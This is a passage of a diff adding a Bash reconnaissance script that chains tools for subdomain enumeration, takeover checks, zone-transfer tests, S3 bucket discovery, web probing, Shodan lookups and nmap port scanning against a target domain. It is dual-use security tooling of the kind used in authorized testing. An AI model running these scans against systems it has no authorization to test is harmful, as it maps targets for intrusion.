osint/domain_info_general.txt | grep -E "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" | grep "https://domainbigdata.com" | tr -s ' ' ',' | cut -d ',' -f3 > .tmp/domain_registrant_ip.txt + + sed -i -n '/Copyright/q;p' osint/domain_info_general.txt + + if [ -s ".tmp/domain_registrant_name.txt" ] + then + for line in $(cat .tmp/domain_registrant_name.txt); do + lynx -dump $line | tail -n +18 | sed -n '/]domainbigdata.com/q;p' >> osint/domain_info_name.txt && echo -e "\n\n#######################################################################\n\n" >> osint/domain_info_name.txt + done + fi + + if [ -s ".tmp/domain_registrant_email.txt" ] + then + for line in $(cat .tmp/domain_registrant_email.txt); do + lynx -dump $line | tail -n +18 | sed -n '/]domainbigdata.com/q;p' >> osint/domain_info_email.txt && echo -e "\n\n#######################################################################\n\n" >> osint/domain_info_email.txt + done + fi + + if [ -s ".tmp/domain_registrant_ip.txt" ] + then + for line in $(cat .tmp/domain_registrant_ip.txt); do + lynx -dump $line | tail -n +18 | sed -n '/]domainbigdata.com/q;p' >> osint/domain_info_ip.txt && echo -e "\n\n#######################################################################\n\n" >> osint/domain_info_ip.txt + done + fi + end_func "Results are saved in osint/domain_info_[general/name/email/ip].txt" ${FUNCNAME[0]} + else + if [ "$DOMAIN_INFO" = false ] || [ "$OSINT" = false ]; then + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" + else + printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" + fi + fi +} + + +############################################################################################################### +############################################### SUBDOMAINS #################################################### +############################################################################################################### + +function subdomains_full(){ + NUMOFLINES_subs="0" + NUMOFLINES_probed="0" + printf "${bgreen}#######################################################################\n\n" + printf "${bblue} Subdomain Enumeration\n\n" + if [ -f "subdomains/subdomains.txt" ] + then + eval cp subdomains/subdomains.txt .tmp/subdomains_old.txt $DEBUG_ERROR + fi + if [ -f "webs/webs.txt" ] + then + eval cp webs/webs.txt .tmp/probed_old.txt $DEBUG_ERROR + fi + + if [ "$update_resolvers" = true ] + then + notification "Updating resolvers lists..." warn + axiom-exec 'if [ \$(find "/home/op/lists/resolvers.txt" -mtime +1 -print) ] || [ \$(cat /home/op/lists/resolvers.txt | wc -l) -le 40 ] ; then dnsvalidator -tL https://public-dns.info/nameservers.txt -threads 100 -o /home/op/lists/resolvers.txt ; cp /home/op/lists/resolvers.txt /home/op/recon/puredns/resolvers.txt; fi' &>/dev/null + notification "Updated" good + fi + + sub_passive + sub_crt + sub_active + sub_brute + sub_permut + if [ "$DEEP" = true ] ; then + sub_recursive + fi + sub_dns + sub_scraping + webprobe_simple + if [ -f "subdomains/subdomains.txt" ] + then + deleteOutScoped $outOfScope_file subdomains/subdomains.txt + NUMOFLINES_subs=$(eval cat subdomains/subdomains.txt $DEBUG_ERROR | anew .tmp/subdomains_old.txt | wc -l) + fi + if [ -f "webs/webs.txt" ] + then + deleteOutScoped $outOfScope_file webs/webs.txt + NUMOFLINES_probed=$(eval cat webs/webs.txt $DEBUG_ERROR | anew .tmp/probed_old.txt | wc -l) + fi + printf "${bblue}\n Total subdomains: ${reset}\n\n" + notification "- ${NUMOFLINES_subs} new alive subdomains" good + eval cat subdomains/subdomains.txt $DEBUG_ERROR | sort + notification "- ${NUMOFLINES_probed} new web probed" good + eval cat webs/webs.txt $DEBUG_ERROR | sort + notification "Subdomain Enumeration Finished" good + printf "${bblue} Results are saved in subdomains/subdomains.txt and webs/webs.txt${reset}\n" + printf "${bgreen}#######################################################################\n\n" +} + +function sub_passive(){ + if [ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ] + then + start_subfunc "Running : Passive Subdomain Enumeration" + echo "/home/op/go/bin/subfinder -d ${domain}" > .tmp/sub_passive_commands.txt + echo "/home/op/go/bin/assetfinder --subs-only ${domain}" >> .tmp/sub_passive_commands.txt + echo "amass enum -passive -d ${domain}" >> .tmp/sub_passive_commands.txt + echo "/usr/bin/findomain --quiet -t ${domain}" >> .tmp/sub_passive_commands.txt + echo "timeout 10m /home/op/go/bin/waybackurls ${domain} | /home/op/go/bin/unfurl --unique domains" >> .tmp/sub_passive_commands.txt + echo "timeout 10m /home/op/go/bin/gau ${domain} | /home/op/go/bin/unfurl --unique domains" >> .tmp/sub_passive_commands.txt + eval axiom-scan .tmp/sub_passive_commands.txt -m exec -o .tmp/axiom_psub.txt $DEBUG_STD + eval crobat -s $domain $DEBUG_ERROR | anew -q .tmp/crobat_psub.txt + if [ -s "${GITHUB_TOKENS}" ];then + if [ "$DEEP" = true ] ; then + eval github-subdomains -d $domain -t $GITHUB_TOKENS -o .tmp/github_subdomains_psub.txt $DEBUG_STD + else + eval github-subdomains -d $domain -k -q -t $GITHUB_TOKENS -o .tmp/github_subdomains_psub.txt $DEBUG_STD + fi + fi + eval curl -s "https://jldc.me/anubis/subdomains/${domain}" $DEBUG_ERROR | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sed '/^\./d' | anew -q .tmp/jldc_psub.txt + if echo $domain | grep -q ".mil$"; then + mildew + mv mildew.out .tmp/mildew.out + cat .tmp/mildew.out | grep ".$domain$" | anew -q .tmp/mil_psub.txt + fi + NUMOFLINES=$(eval cat .tmp/*_psub.txt $DEBUG_ERROR | sed "s/*.//" | anew .tmp/passive_subs.txt | wc -l) + end_subfunc "${NUMOFLINES} new subs (passive)" ${FUNCNAME[0]} + else + printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" + fi +} + +function sub_crt(){ + if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$SUBCRT" = true ] + then + start_subfunc "Running : Crtsh Subdomain Enumeration" + + echo "python3 -u /home/op/recon/ctfr/ctfr.py -d ${domain} -o ${domain}_ctfr.txt; cat ${domain}_ctfr.txt" > .tmp/sub_ctrf_commands.txt + eval axiom-scan .tmp/sub_ctrf_commands.txt -m exec -o .tmp/crtsh_subs_tmp.txt $DEBUG_STD + eval curl "https://tls.bufferover.run/dns?q=.${domain}" $DEBUG_ERROR | eval jq -r .Results[] $DEBUG_ERROR | cut -d ',' -f3 | grep -F ".$domain" | anew -q .tmp/crtsh_subs.txt + eval curl "https://dns.bufferover.run/dns?q=.${domain}" $DEBUG_ERROR | eval jq -r '.FDNS_A'[],'.RDNS'[] $DEBUG_ERROR | cut -d ',' -f2 | grep -F ".$domain" | anew -q .tmp/crtsh_subs_tmp.txt + NUMOFLINES=$(eval cat .tmp/crtsh_subs_tmp.txt $DEBUG_ERROR | sed "s/*.//" | anew .tmp/crtsh_subs.txt | wc -l) + end_subfunc "${NUMOFLINES} new subs (cert transparency)" ${FUNCNAME[0]} + else + if [ "$SUBCRT" = false ]; then + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" + else + printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" + fi + fi +} + +function sub_active(){ + if [ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ] + then + start_subfunc "Running : Active Subdomain Enumeration" + if [ -s "${inScope_file}" ] + then + cat ${inScope_file} .tmp/inscope_subs.txt + fi + cat .tmp/*_subs.txt | anew -q .tmp/subs_no_resolved.txt + deleteOutScoped $outOfScope_file .tmp/subs_no_resolved.txt + eval axiom-scan .tmp/subs_no_resolved.txt -m puredns-resolve -o .tmp/subdomains_tmp.txt $DEBUG_STD + echo $domain | dnsx -silent -retry 3 | anew -q .tmp/subdomains_tmp.txt + NUMOFLINES=$(eval cat .tmp/subdomains_tmp.txt $DEBUG_ERROR | grep "$domain$" | anew subdomains/subdomains.txt | wc -l) + end_subfunc "${NUMOFLINES} new subs (active resolution)" ${FUNCNAME[0]} + else + printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" + fi +} + +function sub_dns(){ + if [ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ] + then + start_subfunc "Running : DNS Subdomain Enumeration" + eval axiom-scan subdomains/subdomains.txt -m dnsx -retry 3 -silent -cname -resp -o subdomains/subdomains_cname.txt $DEBUG_STD + cat subdomains/subdomains_cname.txt | cut -d '[' -f2 | sed 's/.$//' | grep ".$domain$" | anew -q .tmp/subdomains_dns.txt + eval axiom-scan .tmp/subdomains_dns.txt -m puredns-resolve -o .tmp/subdomains_dns_resolved.txt $DEBUG_STD + NUMOFLINES=$(eval cat .tmp/subdomains_dns_resolved.txt $DEBUG_ERROR | grep ".$domain$" |anew subdomains/subdomains.txt | wc -l) + end_subfunc "${NUMOFLINES} new subs (dns resolution)" ${FUNCNAME[0]} + else + printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" + fi +} + +function sub_brute(){ + if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$SUBBRUTE" = true ] + then + start_subfunc "Running : Bruteforce Subdomain Enumeration" + if [ "$DEEP" = true ] ; then + eval axiom-scan $subs_wordlist_big -m puredns-single $domain -o .tmp/subs_brute.txt $DEBUG_STD + else + eval axiom-scan $subs_wordlist -m puredns-single $domain -o .tmp/subs_brute.txt $DEBUG_STD + fi + NUMOFLINES=$(eval cat .tmp/subs_brute.txt $DEBUG_ERROR | sed "s/*.//" | grep ".$domain$" |anew subdomains/subdomains.txt | wc -l) + end_subfunc "${NUMOFLINES} new subs (bruteforce)" ${FUNCNAME[0]} + else + if [ "$SUBBRUTE" = false ]; then + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" + else + printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" + fi + fi +} + +function sub_scraping(){ + if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$SUBSCRAPING" = true ] + then + start_subfunc "Running : Source code scraping subdomain search" + touch .tmp/scrap_subs.txt + eval axiom-scan subdomains/subdomains.txt -m httpx -follow-host-redirects -random-agent -status-code -threads $HTTPX_THREADS -timeout 15 -silent -retries 2 -no-color -o .tmp/probed_tmp_scrap1.txt $DEBUG_STD && cat .tmp/probed_tmp_scrap1.txt | cut -d ' ' -f1 | grep ".$domain$" | anew -q .tmp/probed_tmp_scrap.txt + eval axiom-scan .tmp/probed_tmp_scrap.txt -m httpx -csp-probe -random-agent -status-code -threads $HTTPX_THREADS -timeout 15 -silent -retries 2 -no-color -o .tmp/probed_tmp_scrap2.txt $DEBUG_STD && cat .tmp/probed_tmp_scrap2.txt | cut -d ' ' -f1 | grep ".$domain$" | anew .tmp/probed_tmp_scrap.txt | unfurl -u domains | anew -q .tmp/scrap_subs.txt + eval axiom-scan .tmp/probed_tmp_scrap.txt -m httpx -tls-grab -tls-probe -random-agent -status-code -threads $HTTPX_THREADS -timeout 15 -silent -retries 2 -no-color -o .tmp/probed_tmp_scrap3.txt $DEBUG_STD && cat .tmp/probed_tmp_scrap3.txt | cut -d ' ' -f1 | grep ".$domain$" | anew .tmp/probed_tmp_scrap.txt | unfurl -u domains | anew -q .tmp/scrap_subs.txt + if [ "$DEEP" = true ] ; then + eval axiom-scan .tmp/probed_tmp_scrap.txt -m gospider --js -d 3 --sitemap --robots -w -r -o .tmp/gospider $DEBUG_STD + else + eval axiom-scan .tmp/probed_tmp_scrap.txt -m gospider --js -d 2 --sitemap --robots -w -r -o .tmp/gospider $DEBUG_STD + fi + cat .tmp/gospider/* | sed '/^.\{2048\}./d' | anew -q .tmp/gospider.txt + cat .tmp/gospider.txt | egrep -o 'https?://[^ ]+' | sed 's/]$//' | unfurl --unique domains | grep ".$domain$" | anew -q .tmp/scrap_subs.txt + eval axiom-scan .tmp/scrap_subs.txt -m puredns-resolve -o .tmp/scrap_subs_resolved.txt $DEBUG_STD + NUMOFLINES=$(eval cat .tmp/scrap_subs_resolved.txt $DEBUG_ERROR | grep ".$domain$" |anew subdomains/subdomains.txt | tee .tmp/diff_scrap.txt | wc -l) + eval axiom-scan .tmp/diff_scrap.txt -m httpx -follow-host-redirects -random-agent -status-code -threads $HTTPX_THREADS -timeout 15 -silent -retries 2 -no-color -o .tmp/probed_tmp_scrap4.txt $DEBUG_STD && eval cat .tmp/probed_tmp_scrap4.txt $DEBUG_ERROR | cut -d ' ' -f1 | grep ".$domain$" | anew -q .tmp/probed_tmp_scrap.txt + end_subfunc "${NUMOFLINES} new subs (code scraping)" ${FUNCNAME[0]} + else + if [ "$SUBSCRAPING" = false ]; then + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" + else + printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" + fi + fi +} + +function sub_permut(){ + if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$SUBPERMUTE" = true ] + then + start_subfunc "Running : Permutations Subdomain Enumeration" + if [ "$DEEP" = true ] ; then + eval axiom-scan subdomains/subdomains.txt -m dnscewl -o .tmp/DNScewl1_.txt $DEBUG_STD && cat .tmp/DNScewl1_.txt | grep ".$domain$" > .tmp/DNScewl1.txt + eval axiom-scan .tmp/DNScewl1.txt -m puredns-resolve -o .tmp/permute1_tmp.txt $DEBUG_STD + eval cat .tmp/permute1_tmp.txt $DEBUG_ERROR | anew -q .tmp/permute1.txt + eval axiom-scan .tmp/permute1.txt -m dnscewl -o .tmp/DNScewl2_.txt $DEBUG_STD && cat .tmp/DNScewl2_.txt | grep ".$domain$" > .tmp/DNScewl2.txt + eval axiom-scan .tmp/DNScewl2.txt -m puredns-resolve -o .tmp/permute2_tmp.txt $DEBUG_STD + eval cat .tmp/permute2_tmp.txt $DEBUG_ERROR | anew -q .tmp/permute2.txt + eval cat .tmp/permute1.txt .tmp/permute2.txt $DEBUG_ERROR | anew -q .tmp/permute_subs.txt + else + if [[ $(cat .tmp/subs_no_resolved.txt | wc -l) -le 100 ]] + then + eval axiom-scan .tmp/subs_no_resolved.txt -m dnscewl -o .tmp/DNScewl1_.txt $DEBUG_STD && cat .tmp/DNScewl1_.txt | grep ".$domain$" > .tmp/DNScewl1.txt + eval axiom-scan .tmp/DNScewl1.txt -m puredns-resolve -o .tmp/permute1_tmp.txt $DEBUG_STD + eval cat .tmp/permute1_tmp.txt $DEBUG_ERROR | anew -q .tmp/permute1.txt + eval axiom-scan .tmp/permute1.txt -m dnscewl -o .tmp/DNScewl2_.txt $DEBUG_STD && cat .tmp/DNScewl2_.txt | grep ".$domain$" > .tmp/DNScewl2.txt + eval axiom-scan .tmp/DNScewl2.txt -m puredns-resolve -o .tmp/permute2_tmp.txt $DEBUG_STD + eval cat .tmp/permute2_tmp.txt $DEBUG_ERROR | anew -q .tmp/permute2.txt + eval cat .tmp/permute1.txt .tmp/permute2.txt $DEBUG_ERROR | anew -q .tmp/permute_subs.txt + elif [[ $(cat .tmp/subs_no_resolved.txt | wc -l) -le 200 ]] + then + eval DNScewl --tL .tmp/subs_no_resolved.txt -p $tools/permutations_list.txt --level=0 --subs --no-color $DEBUG_ERROR | tail -n +14 | grep ".$domain$" > .tmp/DNScewl1.txt + eval $tools/puredns/puredns resolve .tmp/DNScewl1.txt -w .tmp/permute_tmp.txt -r $resolvers -rt $resolvers_trusted -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD + eval cat .tmp/permute_tmp.txt $DEBUG_ERROR | anew -q .tmp/permute_subs.txt + else + if [[ $(cat subdomains/subdomains.txt | wc -l) -le 100 ]] + then + eval axiom-scan subdomains/subdomains.txt -m dnscewl -o .tmp/DNScewl1_.txt $DEBUG_STD && cat .tmp/DNScewl1_.txt | grep ".$domain$" > .tmp/DNScewl1.txt + eval axiom-scan .tmp/DNScewl1.txt -m puredns-resolve -o .tmp/permute1_tmp.txt $DEBUG_STD + eval cat .tmp/permute1_tmp.txt $DEBUG_ERROR | anew -q .tmp/permute1.txt + eval axiom-scan .tmp/permute1.txt -m dnscewl -o .tmp/DNScewl2_.txt $DEBUG_STD && cat .tmp/DNScewl2_.txt | grep ".$domain$" > .tmp/DNScewl2.txt + eval axiom-scan .tmp/DNScewl2.txt -m puredns-resolve -o .tmp/permute2_tmp.txt $DEBUG_STD + eval cat .tmp/permute2_tmp.txt $DEBUG_ERROR | anew -q .tmp/permute2.txt + eval cat .tmp/permute1.txt .tmp/permute2.txt $DEBUG_ERROR | anew -q .tmp/permute_subs.txt + elif [[ $(cat subdomains/subdomains.txt | wc -l) -le 200 ]] + then + eval axiom-scan subdomains/subdomains.txt -m dnscewl -o .tmp/DNScewl1_.txt $DEBUG_STD && cat .tmp/DNScewl1_.txt | grep ".$domain$" > .tmp/DNScewl1.txt + eval axiom-scan .tmp/DNScewl1.txt -m puredns-resolve -o .tmp/permute_tmp.txt $DEBUG_STD + eval cat .tmp/permute_tmp.txt $DEBUG_ERROR | anew -q .tmp/permute_subs.txt + else + printf "\n${bred} Skipping Permutations: Too Much Subdomains${reset}\n\n" + fi + fi + fi + if [ -f ".tmp/permute_subs.txt" ] + then + deleteOutScoped $outOfScope_file .tmp/permute_subs.txt + NUMOFLINES=$(eval cat .tmp/permute_subs.txt $DEBUG_ERROR | grep ".$domain$" |anew subdomains/subdomains.txt | wc -l) + else + NUMOFLINES=0 + fi + end_subfunc "${NUMOFLINES} new subs (permutations)" ${FUNCNAME[0]} + else + if [ "$SUBPERMUTE" = false ]; then + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" + else + printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" + fi + fi +} + +function sub_recursive(){ + if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$SUBRECURSIVE" = true ] + then + if [[ $(cat .tmp/subs_no_resolved.txt | wc -l) -le 1000 ]] + then + start_subfunc "Running : Subdomains recursive search" + echo "" > .tmp/brute_recursive_wordlist.txt + for sub in $(cat subdomains/subdomains.txt); do + sed "s/$/.$sub/" $subs_wordlist >> .tmp/brute_recursive_wordlist.txt + done + eval axiom-scan .tmp/brute_recursive_wordlist.txt -m puredns-resolve -o .tmp/brute_recursive_result.txt $DEBUG_STD + cat .tmp/brute_recursive_result.txt | anew -q .tmp/brute_recursive.txt + eval axiom-scan .tmp/brute_recursive.txt -m dnscewl -o .tmp/DNScewl1_recursive_.txt $DEBUG_STD && cat .tmp/DNScewl1_recursive_.txt | grep ".$domain$" > .tmp/DNScewl1_recursive.txt + eval axiom-scan .tmp/DNScewl1_recursive.txt -m puredns-resolve -o .tmp/permute1_recursive_tmp.txt $DEBUG_STD + eval cat .tmp/permute1_recursive_tmp.txt $DEBUG_ERROR | anew -q .tmp/permute1_recursive.txt + eval axiom-scan .tmp/permute1_recursive.txt -m dnscewl -o .tmp/DNScewl2_recursive_.txt $DEBUG_STD && cat .tmp/DNScewl2_recursive_.txt | grep ".$domain$" > .tmp/DNScewl2_recursive.txt + eval axiom-scan .tmp/DNScewl2_recursive.txt -m puredns-resolve -o .tmp/permute2_recursive_tmp.txt $DEBUG_STD + eval cat .tmp/permute1_recursive.txt .tmp/permute2_recursive_tmp.txt $DEBUG_ERROR | anew -q .tmp/permute_recursive.txt + + NUMOFLINES=$(eval cat .tmp/permute_recursive.txt .tmp/brute_recursive.txt $DEBUG_ERROR | grep "$domain$" | anew subdomains/subdomains.txt | wc -l) + + end_subfunc "${NUMOFLINES} new subs (recursive)" ${FUNCNAME[0]} + else + notification "Skipping Recursive: Too Much Subdomains" warn + fi + else + if [ "$SUBRECURSIVE" = false ]; then + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" + else + printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" + fi + fi +} + +function subtakeover(){ + if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$SUBTAKEOVER" = true ] + then + start_func "Looking for possible subdomain takeover" + touch .tmp/tko.txt + eval axiom-scan webs/webs.txt -m nuclei -wL /home/op/recon/nuclei/nuclei-templates/takeovers/ -o .tmp/tko.txt $DEBUG_STD + NUMOFLINES=$(eval cat .tmp/tko.txt $DEBUG_ERROR | anew webs/takeover.txt | wc -l) + if [ "$NUMOFLINES" -gt 0 ]; then + notification "${NUMOFLINES} new possible takeovers found" info + fi + end_func "Results are saved in webs/takeover.txt" ${FUNCNAME[0]} + else + if [ "$SUBTAKEOVER" = false ]; then + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" + else + printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" + fi + fi +} + +function zonetransfer(){ + if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$ZONETRANSFER" = true ] + then + start_func "Zone transfer check" + eval python3 $tools/dnsrecon/dnsrecon.py -d $domain -a -j subdomains/zonetransfer.json $DEBUG_STD + if grep -q "\"zone_transfer\"\: \"success\"" subdomains/zonetransfer.json ; then notification "Zone transfer found on ${domain}!" info; fi + end_func "Results are saved in subdomains/zonetransfer.txt" ${FUNCNAME[0]} + else + if [ "$ZONETRANSFER" = false ]; then + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" + else + printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" + fi + fi +} + +function s3buckets(){ + if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$S3BUCKETS" = true ] + then + start_func "AWS S3 buckets search" + eval axiom-scan subdomains/subdomains.txt -m s3scanner -o .tmp/s3buckets.txt $DEBUG_STD + NUMOFLINES=$(eval cat .tmp/s3buckets.txt $DEBUG_ERROR | anew subdomains/s3buckets.txt | wc -l) + if [ "$NUMOFLINES" -gt 0 ]; then + notification "${NUMOFLINES} new S3 buckets found" info + fi + end_func "Results are saved in subdomains/s3buckets.txt" ${FUNCNAME[0]} + else + if [ "$S3BUCKETS" = false ]; then + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" + else + printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" + fi + fi +} + +############################################################################################################### +########################################### WEB DETECTION ##################################################### +############################################################################################################### + +function webprobe_simple(){ + if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$WEBPROBESIMPLE" = true ] + then + start_subfunc "Running : Http probing" + + if [ -s ".tmp/probed_tmp_scrap.txt" ] + then + mv .tmp/probed_tmp_scrap.txt .tmp/probed_tmp.txt + else + eval axiom-scan subdomains/subdomains.txt -m httpx -follow-host-redirects -random-agent -threads $HTTPX_THREADS -status-code -timeout 15 -silent -retries 2 -no-color -o .tmp/probed_tmp_.txt $DEBUG_STD && cat .tmp/probed_tmp_.txt | cut -d ' ' -f1 | grep ".$domain$" | anew -q .tmp/probed_tmp.txt + fi + deleteOutScoped $outOfScope_file .tmp/probed_tmp.txt + NUMOFLINES=$(eval cat .tmp/probed_tmp.txt $DEBUG_ERROR | anew webs/webs.txt | wc -l) + end_subfunc "${NUMOFLINES} new websites resolved" ${FUNCNAME[0]} + else + if [ "$WEBPROBESIMPLE" = false ]; then + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" + else + printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" + fi + fi +} + +function webprobe_full(){ + if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$WEBPROBEFULL" = true ] + then + start_func "Http probing non standard ports" + eval axiom-scan subdomains/subdomains.txt -m httpx -ports 81,300,591,593,832,981,1010,1311,1099,2082,2095,2096,2480,3000,3128,3333,4243,4567,4711,4712,4993,5000,5104,5108,5280,5281,5601,5800,6543,7000,7001,7396,7474,8000,8001,8008,8014,8042,8060,8069,8080,8081,8083,8088,8090,8091,8095,8118,8123,8172,8181,8222,8243,8280,8281,8333,8337,8443,8500,8834,8880,8888,8983,9000,9001,9043,9060,9080,9090,9091,9200,9443,9502,9800,9981,10000,10250,11371,12443,15672,16080,17778,18091,18092,20720,32000,55440,55672 -follow-host-redirects -random-agent -status-code -timeout 10 -threads $HTTPX_UNCOMMONPORTS_THREADS -silent -retries 2 -no-color -o .tmp/probed_uncommon_ports_tmp_.txt $DEBUG_STD && cat .tmp/probed_uncommon_ports_tmp_.txt | cut -d ' ' -f1 | grep ".$domain$" | anew -q .tmp/probed_uncommon_ports_tmp.txt + NUMOFLINES=$(eval cat .tmp/probed_uncommon_ports_tmp.txt $DEBUG_ERROR | anew webs/webs_uncommon_ports.txt | wc -l) + notification "Uncommon web ports: ${NUMOFLINES} new websites" good + eval cat webs/webs_uncommon_ports.txt $DEBUG_ERROR + end_func "Results are saved in webs/webs_uncommon_ports.txt" ${FUNCNAME[0]} + else + if [ "$WEBPROBEFULL" = false ]; then + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" + else + printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" + fi + fi +} + +function screenshot(){ + if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$WEBSCREENSHOT" = true ] + then + start_func "Web Screenshots" + eval axiom-scan webs/webs.txt -m gowitness --disable-logging -o screenshots $DEBUG_STD + eval axiom-scan webs/webs_uncommon_ports.txt -m gowitness --disable-logging -o screenshots $DEBUG_STD + end_func "Results are saved in screenshots folder" ${FUNCNAME[0]} + else + if [ "$WEBSCREENSHOT" = false ]; then + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" + else + printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" + fi + fi +} + +############################################################################################################### +############################################# HOST SCAN ####################################################### +############################################################################################################### + +function favicon(){ + if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$FAVICON" = true ] + then + start_func "Favicon Ip Lookup" + cd $tools/fav-up + eval python3 favUp.py -w $domain -sc -o favicontest.json $DEBUG_STD + if [ -f "favicontest.json" ] + then + cat favicontest.json | eval jq -r '.found_ips' $DEBUG_ERROR | grep -v "not-found" > favicontest.txt + sed -i "s/|/\n/g" favicontest.txt + eval cat favicontest.txt $DEBUG_ERROR + eval mv favicontest.txt $dir/hosts/favicontest.txt $DEBUG_ERROR + eval rm favicontest.json $DEBUG_ERROR + fi + cd $dir + end_func "Results are saved in hosts/favicontest.txt" ${FUNCNAME[0]} + else + if [ "$FAVICON" = false ]; then + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" + else + printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" + fi + fi +} + +function portscan(){ + if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$PORTSCANNER" = true ] + then + start_func "Port scan" + for sub in $(cat subdomains/subdomains.txt); do + echo "$sub $(dig +short a $sub | tail -n1)" | anew -q .tmp/subs_ips.txt + done + awk '{ print $2 " " $1}' .tmp/subs_ips.txt | sort -k2 -n | anew -q hosts/subs_ips_vhosts.txt + eval cat hosts/subs_ips_vhosts.txt $DEBUG_ERROR | cut -d ' ' -f1 | egrep -iv "^(127|10|169|172|192)\." | anew -q hosts/ips.txt + eval axiom-scan webs/webs.txt -m cf-check -o .tmp/ips_nowaf_.txt $DEBUG_STD && cat .tmp/ips_nowaf_.txt | egrep -iv "^(127|10|169|172|192)\." | anew -q .tmp/ips_nowaf.txt + printf "${bblue}\n Resolved IP addresses (No WAF) ${reset}\n\n"; + eval cat .tmp/ips_nowaf.txt $DEBUG_ERROR | sort + + printf "${bblue}\n Scanning ports... ${reset}\n\n"; + if [ "$PORTSCAN_PASSIVE" = true ] && [ ! -f "hosts/portscan_passive.txt" ] + then + for sub in $(cat hosts/ips.txt); do + shodan host $sub 2>/dev/null >> hosts/portscan_passive.txt && echo -e "\n\n#######################################################################\n\n" >> hosts/portscan_passive.txt + done + fi + + if [ "$PORTSCAN_ACTIVE" = true ] + then + eval axiom-scan .tmp/ips_nowaf.txt -m nmap --top-ports 1000 -sV -n --max-retries 2 -oN hosts/portscan_active.txt -oG 